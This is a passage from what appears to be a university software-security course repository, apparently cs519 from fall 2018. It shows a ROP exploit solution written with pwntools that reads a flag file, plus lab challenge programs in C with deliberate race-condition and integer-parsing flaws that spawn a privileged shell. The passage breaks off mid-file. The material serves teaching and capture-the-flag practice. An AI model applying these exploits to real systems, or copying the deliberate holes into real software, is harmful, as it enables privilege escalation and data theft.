s.st_gid); 34 | if (getgid() != s.st_gid) { 35 | printf("You cannot read the file that is not with your group id!\n"); 36 | exit(-1); 37 | } 38 | 39 | printf("Processing\n"); 40 | sleep(1); 41 | printf("Processing.\n"); 42 | sleep(1); 43 | printf("Processing..\n"); 44 | sleep(1); 45 | 46 | // time of use 47 | int fd = open(filename, O_RDONLY); 48 | 49 | memset(filename, 0, sizeof(filename)); 50 | printf("Reading the file!!!\n"); 51 | read(fd, filename, 100); 52 | write(1, filename, 100); 53 | close(fd); 54 | printf("Finished, UwU!\n"); 55 | } 56 | -------------------------------------------------------------------------------- /solutions/week5/rop-4-32.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process("./rop-nosymlink-32") 6 | 7 | strcpy = p.elf.symbols['strcpy'] 8 | _open = p.elf.symbols['open'] 9 | read = p.elf.symbols['read'] 10 | printf = p.elf.symbols['printf'] 11 | 12 | alphabet = 'the quick brown fox jumps over the lazy dog!' 13 | numbers = 'I also put this for you: 1234567890-' 14 | 15 | def get_alphabet_address(ch): 16 | idx = alphabet.find(ch) 17 | return 0x8048768 + idx 18 | 19 | def get_numbers(ch): 20 | idx = numbers.find(ch) 21 | return 0x8048798 + idx 22 | 23 | slash = 0x80487e0 24 | 25 | target_path = '/home/blue9057/dev/cs519-fall2018/lab/week6/rop-nosymlink/flag-32' 26 | 27 | #0x08048738 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 28 | ppppr = 0x8048738 29 | pppr = 0x8048739 30 | ppr = 0x804873a 31 | pr = 0x804873b 32 | 33 | payload = "A" * (0x88 + 4) 34 | 35 | addr_buffer = 0x804a02c 36 | 37 | idx = 0 38 | for c in target_path: 39 | payload += p32(strcpy) + p32(ppr) + p32(addr_buffer + idx) 40 | if c == '/': 41 | payload += p32(slash) 42 | elif c in '1234567890-': 43 | payload += p32(get_numbers(c)) 44 | else: 45 | payload += p32(get_alphabet_address(c)) 46 | idx += 1 47 | 48 | payload += p32(strcpy) + p32(ppr) + p32(addr_buffer + len(target_path)) + \ 49 | p32(slash+1) 50 | 51 | payload += p32(_open) + p32(ppr) + p32(addr_buffer) + p32(0) 52 | payload += p32(read) + p32(printf) + p32(3) + p32(addr_buffer) + p32(100) 53 | 54 | with open('exploit.txt','wb') as f: 55 | f.write(payload) 56 | 57 | p.sendline(payload) 58 | 59 | p.interactive() 60 | -------------------------------------------------------------------------------- /src/week1/challenges/level4/level4.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #include 7 | 8 | uint64_t result; 9 | 10 | void get_a_shell() { 11 | printf("Spawning a privileged shell\n"); 12 | setregid(getegid(), getegid()); 13 | execl("/bin/bash", "bash", NULL); 14 | } 15 | 16 | void get() { 17 | result = 0; 18 | uint32_t value[5]; 19 | for(int i=0; i<5; ++i) { 20 | printf("Please give me your integer %d\n", i+1); 21 | scanf("%u", &value[i]); 22 | } 23 | 24 | result += value[0] + value[3] + value[4]; 25 | } 26 | void calculate() { 27 | if(result == 1213952) { 28 | printf("Correct!\n"); 29 | get_a_shell(); 30 | } 31 | else { 32 | printf("Wrong value %llu!!\n", result); 33 | exit(-1); 34 | } 35 | } 36 | 37 | void password() { 38 | char buf[512]; 39 | memset(buf, 0, 512); 40 | scanf("%20s", buf); 41 | 42 | size_t length = strlen(buf); 43 | if(length != 16) { 44 | printf("Wrong string length!\n"); 45 | exit(-1); 46 | } 47 | 48 | uint32_t value = strtoul(buf, 0, 10); 49 | snprintf(buf, 20, "%d", value); 50 | 51 | if(strcmp(buf, "13371337") == 0) { 52 | result = value; 53 | printf("Great! you got my password!\n"); 54 | return; 55 | } 56 | else { 57 | printf("Wrong password, access denied.\n"); 58 | exit(-1); 59 | } 60 | 61 | // not-reach 62 | exit(-2); 63 | } 64 | 65 | int main() { 66 | printf("Let's start a more complex game!\n"); 67 | password(); 68 | get(); 69 | calculate(); 70 | } 71 | -------------------------------------------------------------------------------- /src/week1/challenges/level5/level5.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #include 7 | 8 | uint64_t result; 9 | 10 | char password_string[] = "5385876380"; 11 | 12 | void get_a_shell() { 13 | printf("Spawning a privileged shell\n"); 14 | setregid(getegid(), getegid()); 15 | execl("/bin/bash", "bash", NULL); 16 | } 17 | 18 | void password() { 19 | char buf[512]; 20 | memset(buf, 0, 512); 21 | 22 | // manual scanf 23 | int t; 24 | char *a; 25 | for(int i=0; i